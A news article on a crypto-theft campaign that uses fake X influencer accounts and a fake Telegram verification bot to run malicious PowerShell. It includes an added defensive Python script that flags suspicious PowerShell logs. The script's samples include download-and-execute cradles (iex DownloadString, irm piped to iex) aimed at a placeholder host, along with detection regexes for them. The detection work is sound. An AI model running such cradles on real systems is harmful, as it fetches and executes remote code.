Scammers have begun using a combination of social engineering and fake Telegram verification bots to spread malware that aims to steal cryptocurrency from wallets, according to blockchain security firm Scam Sniffer.
In a December 10 post, Scam Sniffer reported that the attackers create fake accounts on the X platform (formerly Twitter), posing as well-known crypto influencers. They then invite users to Telegram groups, promising useful information about investments.
Once in such a group, users are asked to undergo verification through a fake bot called “OfficiaISafeguardBot.” The bot manufactures urgency by putting a time limit on the verification step. Once activated, it runs malicious PowerShell code that installs software to compromise the system and steal crypto wallet data.
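The article does not publish the PowerShell payload itself, so the defender-side question is how to spot this kind of execution after the fact. The following is an added example, not code from Scam Sniffer or from the article: a small triage script that scores PowerShell script-block text (the kind recorded by script block logging, Windows Event ID 4104) for generic abuse signals such as encoded commands, hidden windows, execution-policy bypass and download-and-execute cradles. The sample log entries are constructed for illustration, the Base64 blob is a placeholder, and the indicator weights and threshold are assumptions to tune against your own baseline.

```python
import re

# Constructed sample script-block entries (Event ID 4104 style). They are
# illustrative only and are not the payload used in the campaign described.
SAMPLE_SCRIPT_BLOCKS = [
    # Benign: ordinary administrative one-liner
    "Get-ChildItem -Path C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB }",
    # Suspicious: hidden window, policy bypass and an encoded command
    # (the Base64 below is a placeholder, not a real payload)
    "powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    # Suspicious: classic download cradle piped into Invoke-Expression
    "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')",
    # Suspicious: Invoke-RestMethod alias fetching content that is then executed
    "$r = irm https://example.invalid/p; iex $r",
]

# Generic PowerShell abuse indicators with assumed weights. These are
# heuristics; tune them against your own environment's baseline.
INDICATORS = {
    "encoded_command": (
        re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}"),
        3,
    ),
    "hidden_window": (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2),
    "execution_policy_bypass": (re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"), 2),
    "download_cradle": (
        re.compile(
            r"(?i)(?:DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod"
            r"|\biwr\b|\birm\b|\bcurl\b|\bwget\b)"
        ),
        2,
    ),
    "invoke_expression": (re.compile(r"(?i)(?:Invoke-Expression|\biex\b)"), 2),
}

# Assumed threshold: a single weak signal is noise, two together are worth a look.
SUSPICIOUS_THRESHOLD = 4


def analyze(script_block: str) -> dict:
    """Score one script-block text and list the indicators that matched."""
    matched = [name for name, (pattern, _) in INDICATORS.items() if pattern.search(script_block)]
    score = sum(INDICATORS[name][1] for name in matched)
    return {
        "text": script_block,
        "indicators": matched,
        "score": score,
        "suspicious": score >= SUSPICIOUS_THRESHOLD,
    }


def triage(script_blocks) -> list:
    """Analyze a batch of script-block entries and return the results in order."""
    return [analyze(block) for block in script_blocks]


if __name__ == "__main__":
    for result in triage(SAMPLE_SCRIPT_BLOCKS):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"[{flag:10}] score={result['score']} indicators={result['indicators']}")
```

Run over a real export of 4104 events, the same function can feed a SIEM rule; the point of weighting rather than single-pattern matching is that a legitimate admin script may use one of these features, while a verification-scam payload typically stacks several at once.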
According to Scam Sniffer, there have already been numerous cases where such software was used to steal private keys. The company also noted that all known incidents with this scheme involve the use of a fake verification bot.
“It is not yet known whether other malicious bots exist. However, it is obvious that it is easy for fraudsters to fake other bots and use this scheme further,” Scam Sniffer said.
The experts also noted that malware targeting ordinary users has been around for a long time. However, its development and distribution are becoming increasingly complex and large-scale. Successful scams encourage a “fraud-as-a-service” model, in which the creators of cryptocurrency theft software rent their tools out to other attackers.
Scam Sniffer emphasized that while there have been cases of malware being distributed via Telegram and impersonating famous people, this is the first time that a combination of fake X accounts, fake Telegram channels, and malicious bots has been observed.
The company’s experts have also recorded an increase in the number of scammers posing as other X users. On average, about 300 fake accounts are detected daily in December, while in November their number was about 160 per day.
At least two people have reportedly already lost over $3 million by clicking on fake links and signing transactions offered through such accounts.
At the same time, Cado Security Labs warned of a new campaign targeting Web3 employees through fake meeting apps. These apps deliver malware that steals credentials from websites, apps, and cryptocurrency wallets.
Security platform Cyvers added that December could be the peak month for phishing attacks as hackers look to take advantage of the surge in online transactions ahead of the holiday season.